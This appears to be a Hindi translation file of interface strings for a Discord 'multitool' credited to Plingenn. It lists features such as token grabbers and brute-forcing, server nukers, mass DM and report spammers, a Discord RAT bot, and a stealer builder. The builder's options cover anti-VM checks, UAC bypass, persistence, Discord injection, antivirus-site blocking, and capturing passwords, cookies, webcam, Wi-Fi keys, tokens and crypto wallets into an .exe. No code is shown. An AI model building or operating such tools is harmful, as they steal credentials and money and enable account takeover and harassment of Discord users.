टोकन जानकारी{end_space13}
टोकन लॉगिन{end_space16}
टोकन न्यूकर{end_space14}
टोकन ग्रैबर{end_space14}
टोकन अक्षमकरणकर्ता{end_space7}
टोकन ब्रूट-फ़ोर्स{end_space8}
फेक टाइपर{end_space16}
वैनिटी स्नाइपर{end_space11}
ग्रुपचैट स्पैमर{end_space10}
दोस्त अवरोधक{end_space13}
दोस्त हटाने वाला{end_space14}
दोस्त अनुरोध हटाने वाला{end_space2}
नए सर्वर बनाएं{end_space11}
प्रोफ़ाइल बदलने वाला{end_space5}
क्यूआर कोड ग्रैबर{end_space8}
डिस्कॉर्ड रैट बॉट{end_space8}
बटन प्रेसर{end_space15}
मैसेज रिएक्टर{end_space12}
मास डीएम{end_space17}
मास रिपोर्ट{end_space14}
मास दोस्त{end_space16}
डीएम हटाने वाला{end_space10}
डीएम क्लियर करने वाला{end_space4}
नियम अनदरज करने वाला{end_space5}
बायपास रिस्टोरकॉर्ड{end_space6}
बायपास स्लेज हैमर{end_space8}
वेबहुक उपकरण{end_space13}
Plingenn द्वारा बनाई गई{end_space2}
चेंजलॉग{end_space18}
सेटिंग्स{end_space17}
चैट
टोकन प्रबंधन
अगला पृष्ठ{end_space1}
यह चल रहा है:{end_space14}
अमान्य विकल्प, कृपया पुनः प्रयास करें!
उपयोगकर्ता द्वारा बाधित किया गया।
थीम बदलनेवाला
खाता सेटिंग्स
प्रॉक्सी सेटिंग्स
बाह्य दिखने वाला सेटिंग्स
डीबग मोड टॉगल करें
एडमिन पैनल
अमान्य सेटिंग
सियान
नीला
हरा
लाल
सफेद
पीला
बैंगनी
हल्का लाल
हल्का नीला
हल्का हरा
हल्का सियान
हल्का काला
थीम को सेट किया गया
खाता अवलोकन
मेरा लाइसेंस
खरीद इतिहास
कोड लौटाओ
सॉफ्टवेयर डाउनलोड करें
उपयोगकर्ता नाम
बनाया गया
उपयोगकर्ता नाम बदलें
लॉगआउट
उपयोगकर्ता नाम बदलने में विफल, उपयोगकर्ता नाम में कम से कम 3 अक्षर होने चाहिए।
क्या आप अपने खाते से लॉगआउट करना चाहते हैं? (Y/N)
उत्पाद
की समय सीमा
तिथि
अपनी सामग्री प्राप्त करने के लिए अपना उत्पाद कोड दर्ज करें।
कोड
आपने पहले से ही कोड लौटाया है।
कृपया Enter दबाने से पहले अपना उत्पाद सहेजें!
प्रतिक्रिया में कुंजी नहीं मिली
दिए गए कोड के लिए डेटा प्राप्त करने में विफल
कोड जानकारी में URL नहीं मिला
अवैध कोड!
प्रॉक्सी उपयोग टॉगल करें
प्रॉक्सी कैश साफ़ करें
अपने प्रॉक्सी कैश में जोड़ें
प्रॉक्सी स्क्रैप करें
अवैध विकल्प
डीबग मोड टॉगल {RED}OFF
डीबग मोड टॉगल {GREEN}ON
नई प्रमाणीकरण प्रणाली जोड़ा गया
कॉन्फ़िग सिस्टम में सुधार
पैनल इंटरफेस का पुन: निर्माण
चैट सिस्टम जोड़ा गया
नए खाता सेटिंग्स जोड़े गए
बेहतर प्रदर्शन के लिए कैशिंग का अमल
कस्टम डिस्कॉर्ड आरपीसी
डिस्कॉर्ड आरपीसी टॉगल करें
कस्टम डिस्कॉर्ड आरपीसी टॉगल करें
कस्टम डिस्कॉर्ड आरपीसी संपादित करें
कस्टम डिस्कॉर्ड आरपीसी बंद किया गया
कस्टम डिस्कॉर्ड आरपीसी चालू किया गया
विवरण (आवश्यक)
विवरण कम से कम 3 अक्षरों का होना चाहिए।
राज्य (आवश्यक)
राज्य कम से कम 3 वर्णों का होना चाहिए।
बड़ी छवि URL (वैकल्पिक)
बड़े पाठ (वैकल्पिक)
छोटी छवि URL (वैकल्पिक)
छोटा पाठ (वैकल्पिक)
आपके पास कितने बटन होने चाहिए?
बटन के लिए लेबल दर्ज करें
बटन के लिए URL दर्ज करें
अवैध URL प्रारूप। कृपया एक मान्य URL दर्ज करें।
अवैध बटनों की संख्या। कृपया 0 और 2 के बीच एक संख्या दर्ज करें।
डिस्कॉर्ड आरपीसी बंद किया गया
डिस्कॉर्ड आरपीसी चालू किया गया
सामान्य मोड
रिस्टोरकोर्ड मोड (कैप्चा उमार्जन)
कैश चेकर
कस्टम चेकर
सर्वर चेकर
टोकन लोड करने के लिए कस्टम पथ दर्ज करें
सामान्य चैट
समर्थन चैट (अनुपलब्ध)
निजी चैट (अनुपलब्ध)
सर्वर खोज{end_space16}
सर्वर क्लोनर{end_space13}
सर्वर न्यूकर{end_space13}
टोकन जोड़नेवाला{end_space10}
टोकन छोड़नेवाला{end_space10}
टोकन स्पैमर{end_space14}
सीजर{end_space21}
साउंडबोर्ड स्पैमर{end_space8}
वॉयस चैट जॉइनर{end_space11}
प्रोफ़ाइल चित्र बदलनेवाला{end_space4}
ग्लोबल निक चेंजर{end_space9}
सर्वर निक चेंजर{end_space13}
हाइपस्क्वाड चेंजर{end_space8}
प्रोनाउन्स चेंजर{end_space9}
भाषा चेंजर{end_space15}
स्थिति चेंजर{end_space13}
थीम चेंजर{end_space16}
बायो चेंजर{end_space15}
खाता जेनरेटर{end_space13}
वीडियो क्रैश निर्माता{end_space4}
सेटिंग्स साइक्लर{end_space13}
पैच नोट्स{end_space16}
टेलीग्राम{end_space16}
सेल्फबॉट{end_space17}
गिटहब{end_space20}
के बारे में{end_space14}
बाहर निकलें{end_space14}
पिछला पृष्ठ{end_space4}
सर्वर के नाम
संदेश
थ्रेड काउंट
एक त्रुटि हुई:
कैश में कोई टोकन नहीं मिले
बारिश न्यूक डिप्लॉय किया जा रहा है
बारिश न्यूक डिप्लॉय किया गया. . .
संदेश
संदेश आईडी:
सभी उपलब्ध मित्रों को संदेश भेजा गया।
गिल्ड छोड़ दिया:
गिल्ड हटाया:
निम्नलिखित त्रुटि हो गई है और इसे नज़रअंदाज़ किया जा रहा है:
सभी उपलब्ध गिल्ड्स को हटा दिया/छोड़ दिया।
मित्र को हटा रहा है:
मित्र हटा दिया:
सभी उपलब्ध मित्रों को हटा दिया।
बना रहा है
बना दिया
सभी सर्वर बना दिए गए।
बारिश न्यूक सफलतापूर्वक बिगड़ गया!
सफलतापूर्वक रेमे वेस्टलैंड में परिवर्तित हो गया।
कुछ भी जारी रखने के लिए दर्ज करें। . .
सीज़र मोड शुरू हो रहा है (रोशनी/अंधेरे मोड को चालू/बंद करना)
आगे बढ़ने के लिए पर्याप्त मित्र नहीं हैं।
टोकन को प्रोसेस करते समय एक त्रुटि हुई।
चैनल स्पैमर
चैनल आईडी
नियम बायपास
गिल्ड आईडी
टोकन फेक टायपर
ग्लोबल निकर
निक नेम
सर्वर निकर
प्रोनाउंस बदलने वाला
यादृच्छिक प्रोनाउंस (y/n)
प्रोनाउंस
डिलीटेड डीएम:
आगे बढ़ने के लिए पर्याप्त डीएम नहीं हैं।
साइकिल अवरुद्ध
ध्वनि बोर्ड स्पैमर
प्रोग्राम उपयोगकर्ता द्वारा विरामित किया गया।
टोकन के साथ हार्टबीट भेजने में विफल:
टोकन के साथ वीसी में शामिल होने में विफल:
टोकन्स के साथ वीसी में शामिल हो रहा है...
आपके सर्वर को सफलतापूर्वक अपडेट किया गया है, अब आपके सर्वर का उपयोग किया जा सकता है
वेनिटी यूआरएल को अपडेट करने में विफल। स्थिति कोड:
वेनिटी कोड को स्नाइप करने के लिए
वेनिटी कोड लागू करने के लिए सर्वर आईडी
जांचों के बीच देरी (सेकंड्स)
वेनिटी स्नाइपर शुरू हो गया है। Ctrl+C दबाएं रोकने के लिए।
त्रुटि:
वेबहुक स्पैमर
वेबहुक डिलीटर
वेबहुक
वेबहुक सफलतापूर्वक हटा दिया गया
टोकन प्रबंधक
टोकन सहेजें
टोकन साफ करें
टोकन जाँचें और केवल वैध टोकन सहेजें (हां/नहीं)
टोकन कैश खाली किया गया।
टोकन वाले पाठ फ़ाइल का मार्ग दर्ज करें
निर्दिष्ट पाठ फ़ाइल में कोई टोकन नहीं मिले
टोकन चेक करने वाला
सर्वर नाम प्राप्त करने में विफल:
में शामिल हो रहा है
बारिश टोकन ब्रूट-फोर्स। सूचना: यह काम करने में बहुत समय लग सकता है।
यदि आप अत्यधिक भाग्यशाली हैं और किसी का टोकन प्राप्त करने में सक्षम हैं, तो आप 'ब्रूट-फोर्स.txt' में संग्रहीत किया गया होगा।
अपने खाते पर ब्रूट फोर्स हमला करने से पहले हमेशा व्यक्ति से स्पष्ट अनुमति प्राप्त करें।
अमान्य उपयोगकर्ता आईडी, कृपया पुन: प्रयास करें!
मान्य
अमान्य
बिलिंग स्रोतों को लाने में त्रुटि:
नाइट्रो डेटा को लाने में त्रुटि:
कोई बिलिंग जानकारी उपलब्ध नहीं है।
उपयोगकर्ता जानकारी और वेबड्राइवर को एकत्र किया जा रहा है..
फ़ाइल का नाम
फ़ाइल पासवर्ड
क्या आप एक आइकन फ़ाइल प्रदान करना चाहते हैं? (हाँ/नहीं)
अमान्य आइकन पथ या यूआरएल। आइकन को कोई नहीं निर्धारित किया गया है।
मुझे पिंग करें (हाँ/नहीं)
एंटी वीएम (हाँ/नहीं)
स्टार्टअप पर लगाना (हाँ/नहीं)
यूएसी बाइपास (हाँ/नहीं)
मेल्ट (हाँ/नहीं)
कंसोल छुपाएँ (हाँ/नहीं)
वेबकैम को कैप्चर करें (हाँ/नहीं)
पासवर्ड को कैप्चर करें (हाँ/नहीं)
कुकीज़ को कैप्चर करें (हाँ/नहीं)
ऑटोफिल्स को कैप्चर करें (हाँ/नहीं)
इतिहास को कैप्चर करें (हाँ/नहीं)
डिस्कॉर्ड टोकन को कैप्चर करें (हाँ/नहीं)
गेम्स को कैप्चर करें (हाँ/नहीं)
वाईफ़ाई पासवर्ड को कैप्चर करें (हाँ/नहीं)
सिस्टम जानकारी को कैप्चर करें (हाँ/नहीं)
स्क्रीनशॉट को कैप्चर करें (हाँ/नहीं)
टेलीग्राम को कैप्चर करें (हाँ/नहीं)
सामान्य फ़ाइलों को कैप्चर करें (हाँ/नहीं)
वॉलेट्स को कैप्चर करें (हाँ/नहीं)
अमान्य त्रुटि (हाँ/नहीं)
अमान्य त्रुटि शीर्षक
अमान्य त्रुटि संदेश
एंटीवायरस साइटें अवरोधित करें (हाँ/नहीं)
डिस्कॉर्ड इन्जेक्शन (हाँ/नहीं)
फ़ाइल आइकन
{नाम}.exe बनाया जा रहा है, इसमें कुछ सेकंड्स लगेंगे। आपकी सहनशीलता के लिए धन्यवाद!
फ़ाइल 'आउटपुट/ग्रैबरबिल्डर/{नाम}.exe' में है
समूहचैट बनाया गया
रेट सीमित ({response.json()['retry_after']}मिलीसेकंड)
रैंडम चयन के लिए पर्याप्त मित्र उपलब्ध नहीं हैं
क्या आप खुद ही समूहचैट स्पैम करने के लिए उपयोगकर्ता चुनना चाहते हैं या आप यादृच्छिकों का चयन करना चाहते हैं?
खुद ही उपयोगकर्ता चुनें
उपयोगकर्ताओं को यादृच्छिक बनाएं
समूहचैट बनाना
उपयोगकर्ता आईडी
आपके पास कोई कमा (,) नहीं था। प्रारूप एड़ी, आईडी, आईडी3
किसी भी समय के लिए रोकें
ब्लॉक किया गया:
संबंधों को प्राप्त करने में त्रुटि:
आगे बढ़ने के लिए पर्याप्त मित्र अनुरोध नहीं मिला।
आने वाले मित्र अनुरोध से:
मित्र अनुरोध हटा दिया गया:
कुल मित्र अनुरोध हटाए गए:
{सर्वर_नाम} बनाने में त्रुटि हुई: {e}
सर्वर के लिए आइकन हाँ/नहीं
रैंडम सर्वर नाम
कस्टम सर्वर नाम
जो सर्वर बनाए जाएंगे उनका नाम
कृपया आइकन स्थान दर्ज करें
"{चित्र}" को आपके कंप्यूटर पर नहीं मिला जा सका
कस्टम स्थिति
कस्टम जीवनी
फ़ाइल बनाई जा रही है... {i}
फ़ाइल लिखी जा रही है... {i}
ध्यान दें: यह कोड पूरी तरह से काम करने की स्थिति में नहीं है अभी, लेकिन यह अब भी चलाया जा सकता है।\nहालांकि, आपको त्रुटियों या बग्स का सामना करने की संभावना है।
अंतिम फ़ाइल को क्या नाम देना चाहते हैं
रैट कमांड को निष्पादित करने के लिए बॉट टोकन दर्ज करें
बॉट टोकन
स्लैश कमांड पर पंजीकृत गिल्ड आईडी दर्ज करें
त्रुटि फ़ाइल लिखने में: {e}
फ़ाइल को सही ढंग से लिखा गया है "आउटपुट/{फ़ाइलनाम}.py"
अपने स्क्रिप्ट को एक एग्जीक्यूटेबल में रूपांतरित करें (हाँ/नहीं)
फ़ाइल बनाई जा रही है...
पुरानी फ़ाइलों को साफ़ किया जा रहा है...
एक्जीक्यूटेबल फ़ाइल सही ढंग से उत्पन्न की गई है
HTTP त्रुटि हुई: {e}
संदेश आईडी
कृपया वह बटन चुनें जिसे आप दबाना चाहते हैं
{r}({लाइट ब्लैक}{i}{r}) नाम: {लाइट ब्लैक}{बटन लेबल}{r}, कस्टम आईडी: {लाइट ब्लैक}{बटन कस्टम आईडी}{r}
बटन
संदेश में केवल एक बटन पाया गया।
{reaction} को संदेश {message_id} में जोड़ने में विफल। अधिकतम प्रतिक्रियाओं की सीमा पहले ही पहुंच गई है।
अधिकतम प्रतिक्रियाओं की सीमा पहले ही पहुंच गई है।
{reaction} को संदेश {message_id} में जोड़ने में विफल। निषिद्ध: {error_message}
वस्तुओं
चेहरे
जानवर
प्रतीक
प्रतिक्रियाओं में कोई इमोजी नहीं मिला
एपीआई से इमोजी लाने में विफल हुआ
आमंत्रण लिंक
अमान्य आमंत्रण लिंक प्रारूप।
अनुरोध भेजते समय त्रुटि हुई
निमंत्रण जानकारी:
निमंत्रक जानकारी:
सर्वर जानकारी:
चैनल
समाप्ति तिथि
उपयोगकर्ता आईडी
बैज
अनुपलब्ध
नाम
सर्वर आईडी
विवरण
बैनर
बैनर यूआरएल
बैनर यूआरएल (अनुपलब्ध)
वैनिटी यूआरएल
सत्यापन स्तर
स्प्लैश
स्प्लैश यूआरएल
स्प्लैश यूआरएल (अनुपलब्ध)
विशेषताएँ
आक्रमण शुरू हो गया है। रोकने के लिए Ctrl+C दबाएं।
आक्रमण बाधित हो गया है
भाषा चक्रवात शुरू हो गया है। रोकने के लिए Ctrl+C दबाएं।
अमान्य टोकन।
जारी करने के लिए एंटर दबाएं
डिस्कॉर्ड मल्टीटूल | https://discord.gg/N4NvXTnQe3 | Plingenn द्वारा बनाया गया
उपस्थिति सेटिंग्स
पाठ सेटिंग्स
कर्सर सेटिंग्स
पारदर्शिता सेटिंग्स
विंडो सेटिंग्स
भाषा सेटिंग्स
रंग योजना
फॉन्ट फेस
फॉन्ट आकार
लाइन ऊंचाई
फॉन्ट वजन
रेट्रो टर्मिनल प्रभाव
रंग सेटिंग्स
फॉन्ट सेटिंग्स
फॉन्ट आकार सेटिंग्स
लाइन हाइट सेटिंग्स
फॉन्ट वजन सेटिंग्स
रेट्रो सेटिंग्स
कर्सर सेटिंग्स
भाषा {chosen_language} में सेट की गई है
अनधिकृत
प्रकार
घर
संदेश लिंक
अमान्य संदेश लिंक
वापस जा रहा है...
डिस्कॉर्ड आरपीसी से कनेक्ट करने में विफल: {e}
विकल्प
थीम
सेटिंग
संपादित करें
भाषा
पैनल पारदर्शिता
अमान्य पारदर्शिता
विंडो सेटिंग्स
यह विकल्प एक काम के अधीन है
यह विकल्प वर्तमान में उपलब्ध नहीं है। कृपया सहनशील रहें क्योंकि यह बाद में जोड़ा जाएगा।
यह विकल्प वर्तमान में उपलब्ध नहीं है।
इसे आने वाले अपडेटों में '{पुनर्स्थापन}' के साथ बदला जाएगा।
यह विकल्प उपलब्ध नहीं है
ये विकल्प वर्तमान में विकास में हैं
ये विकल्प वर्तमान में विकास में हैं लेकिन उपयोग में रहते हैं। हालांकि, बग या त्रुटियाँ हो सकती हैं।
{pronounce_url} से स्थानांतरिती लाने में विफल: {statuscode}
प्रॉक्सी उपयोग वर्तमान में उपलब्ध नहीं है। हम किसी भी असुविधा के लिए खेद प्रकट करते हैं। यह आने वाले अपडेटों में पहुंचने के लिए उपलब्ध किया जाएगा।
प्रॉक्सी उपयोग टॉगल {RED}OFF
प्रॉक्सी उपयोग टॉगल {GREEN}ON
नए प्रॉक्सी सफलतापूर्वक लिखा गया
सफलतापूर्वक प्रॉक्सी निकाला गया
डन! कुल में {proxies} को छुटाई गई => {temp} | {execution_time}ms
पीसी{end_space6}
अनुमानित बहु-भाषा समर्थन लागू किया गया है।
सामूहिक थ्रेड{end_space12}
फोरम स्पैमर
सामूहिक उपयोगकर्ता DM{end_space4}
उपलब्ध नहीं{end_space14}
सर्वर बूस्टर{end_space18}
टोकन ऑनलाइन उपयोगकर्ता{end_space3}
मतदान निर्माता{end_space11}